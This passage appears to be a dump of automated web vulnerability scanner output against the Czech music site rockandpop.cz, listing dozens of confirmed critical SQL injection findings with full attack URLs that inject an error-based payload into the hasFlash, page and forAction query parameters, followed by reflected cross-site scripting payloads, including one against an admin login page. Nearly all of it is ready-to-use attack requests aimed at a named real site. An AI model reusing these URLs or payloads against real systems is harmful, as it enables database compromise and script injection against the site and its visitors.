344. Parameter Type: Querystring
345. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
346.  
347. Severity: Critical
348. Confirmation: Confirmed
349. URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
350. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
351. Parameter Name: hasFlash
352. Parameter Type: Querystring
353. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
354.  
355. Severity: Critical
356. Confirmation: Confirmed
357. URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
358. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
359. Parameter Name:
360. Parameter Type: Querystring
361. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
362.  
363. Severity: Critical
364. Confirmation: Confirmed
365. URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
366. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
367. Parameter Name: hasFlash
368. Parameter Type: Querystring
369. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
370.  
371. Severity: Critical
372. Confirmation: Confirmed
373. URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
374. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
375. Parameter Name:
376. Parameter Type: Querystring
377. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
378.  
379. Severity: Critical
380. Confirmation: Confirmed
381. URL: http://www.rockandpop.cz/clanky/rozhovory/?page=%27
382. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
383. Parameter Name: page
384. Parameter Type: Querystring
385. Attack Pattern: %27
386.  
387. Severity: Critical
388. Confirmation: Confirmed
389. URL: http://www.rockandpop.cz/clanky/rozhovory/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
390. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
391. Parameter Name: hasFlash
392. Parameter Type: Querystring
393. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
394.  
395. Severity: Critical
396. Confirmation: Confirmed
397. URL: http://www.rockandpop.cz/clanky/rozhovory/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
398. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
399. Parameter Name:
400. Parameter Type: Querystring
401. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
402.  
403. Severity: Critical
404. Confirmation: Confirmed
405. URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
406. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
407. Parameter Name: hasFlash
408. Parameter Type: Querystring
409. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
410.  
411. Severity: Critical
412. Confirmation: Confirmed
413. URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
414. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
415. Parameter Name:
416. Parameter Type: Querystring
417. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
418.  
419. ImpactSeverity: Critical
420. Confirmation: Confirmed
421. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
422. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
423. Parameter Name: hasFlash
424. Parameter Type: Querystring
425. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
426.  
427. Severity: Critical
428. Confirmation: Confirmed
429. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
430. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
431. Parameter Name:
432. Parameter Type: Querystring
433. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
434.  
435. Severity: Critical
436. Confirmation: Confirmed
437. URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
438. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
439. Parameter Name: hasFlash
440. Parameter Type: Querystring
441. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
442.  
443. Severity: Critical
444. Confirmation: Confirmed
445. URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
446. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
447. Parameter Name:
448. Parameter Type: Querystring
449. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
450.  
451. Severity: Critical
452. Confirmation: Confirmed
453. URL: http://www.rockandpop.cz/clanky/tashi-tomas-erml/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
454. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
455. Parameter Name: hasFlash
456. Parameter Type: Querystring
457. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
458.  
459. Severity: Critical
460. Confirmation: Confirmed
461. URL: http://www.rockandpop.cz/foto/upload/?forAction='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
462. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
463. Parameter Name: forAction
464. Parameter Type: Querystring
465. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
466.  
467. Severity: Critical
468. Confirmation: Confirmed
469. URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
470. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
471. Parameter Name: hasFlash
472. Parameter Type: Querystring
473. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
474.  
475. Severity: Critical
476. Confirmation: Confirmed
477. URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
478. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
479. Parameter Name:
480. Parameter Type: Querystring
481. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
482.  
483. Severity: Critical
484. Confirmation: Confirmed
485. URL: http://www.rockandpop.cz/zpravy/festivaly/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
486. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
487. Parameter Name: hasFlash
488. Parameter Type: Querystring
489. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
490.  
491. Severity: Critical
492. Confirmation: Confirmed
493. URL: http://www.rockandpop.cz/zpravy/festivaly/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
494. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
495. Parameter Name:
496. Parameter Type: Querystring
497. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
498.  
499. Severity: Critical
500. Confirmation: Confirmed
501. URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
502. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
503. Parameter Name: hasFlash
504. Parameter Type: Querystring
505. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
506.  
507. Severity: Critical
508. Confirmation: Confirmed
509. URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
510. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
511. Parameter Name:
512. Parameter Type: Querystring
513. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
514.  
515. Severity: Critical
516. Confirmation: Confirmed
517. URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
518. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
519. Parameter Name: hasFlash
520. Parameter Type: Querystring
521. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
522.  
523.  
524. Severity: Critical
525. Confirmation: Confirmed
526. URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
527. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
528. Parameter Name:
529. Parameter Type: Querystring
530. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
531.  
532. Severity: Critical
533. Confirmation: Confirmed
534. URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
535. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
536. Parameter Name: hasFlash
537. Parameter Type: Querystring
538. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
539.  
540. Severity: Critical
541. Confirmation: Confirmed
542. URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
543. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
544. Parameter Name:
545. Parameter Type: Querystring
546. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
547.  
548. Severity: Critical
549. Confirmation: Confirmed
550. URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
551. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
552. Parameter Name: hasFlash
553. Parameter Type: Querystring
554. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
555.  
556. Severity: Critical
557. Confirmation: Confirmed
558. URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
559. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
560. Parameter Name:
561. Parameter Type: Querystring
562. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
563.  
564. Severity: Critical
565. Confirmation: Confirmed
566. URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
567. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
568. Parameter Name: hasFlash
569. Parameter Type: Querystring
570. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
571.  
572. Severity: Critical
573. Confirmation: Confirmed
574. URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
575. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
576. Parameter Name:
577. Parameter Type: Querystring
578. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
579.  
580. Severity: Critical
581. Confirmation: Confirmed
582. URL: http://www.rockandpop.cz/casopis/rock-pop-2-13/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
583. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
584. Parameter Name: hasFlash
585. Parameter Type: Querystring
586. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
587.  
588. Severity: Critical
589. Confirmation: Confirmed
590. URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
591. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
592. Parameter Name: hasFlash
593. Parameter Type: Querystring
594. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
595.  
596. Severity: Critical
597. Confirmation: Confirmed
598. URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
599. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
600. Parameter Name:
601. Parameter Type: Querystring
602. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
603.  
604. Severity: Critical
605. Confirmation: Confirmed
606. Detection Accuracy :
607. URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
608. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
609. Parameter Name: hasFlash
610. Parameter Type: Querystring
611. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
612.  
613. Severity: Critical
614. Confirmation: Confirmed
615. Detection Accuracy :
616. URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
617. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
618. Parameter Name:
619. Parameter Type: Querystring
620. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
621.  
622. Severity: Critical
623. Confirmation: Confirmed
624. URL: http://www.rockandpop.cz/mapa-stranek/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
625. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
626. Parameter Name: hasFlash
627. Parameter Type: Querystring
628. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
629.  
630. Severity: Critical
631. Confirmation: Confirmed
632. URL: http://www.rockandpop.cz/mapa-stranek/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
633. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
634. Parameter Name:
635. Parameter Type: Querystring
636. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
637.  
638. Severity: Critical
639. Confirmation: Confirmed
640. URL: http://www.rockandpop.cz/newsletter/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
641. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
642. Parameter Name: hasFlash
643. Parameter Type: Querystring
644. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
645.  
646. Severity: Critical
647. Confinmation: Confirmed
648. URL: http://www.rockandpop.cz/newsletter/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
649. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
650. Parameter Name:
651. Parameter Type: Querystring
652. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
653.  
654. ||| XSS (Cross-site Scripting)
655.  
656. Severity: Important
657. Confirmation: Confirmed
658. URL: http://www.rockandpop.cz/underwood/login.php?'"--></style></script><script>alert(0x0000BE)</script>
659. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
660. Parameter Name: Query Based
661. Parameter Type: FullQueryString
662. Attack Pattern: '"--></style></script><script>alert(0x0000BE)</script>
663.  
664. Severity: Important
665. Confirmation: Confirmed
666. URL: http://www.rockandpop.cz/zpravy/?'"--></style></script><script>alert(0x0000E0)</script>
667. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
668. Parameter Name: Query Based
669. Parameter Type: FullQueryString
670. Attack Pattern: '"--></style></script><script>alert(0x0000E0)</script>
671.  
672. Impact
673. Severity: Important
674. Confirmation: Confirmed
675. URL: http://www.rockandpop.cz/?'"--></style></script><script>alert(0x0000DB)</script>
676. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
677. Parameter Name: Query Based
678. Parameter Type: FullQueryString
679. Attack Pattern: '"--></style></script><script>alert(0x0000DB)</script>
680.  
681. Severity: Important
682. Confirmation: Confirmed
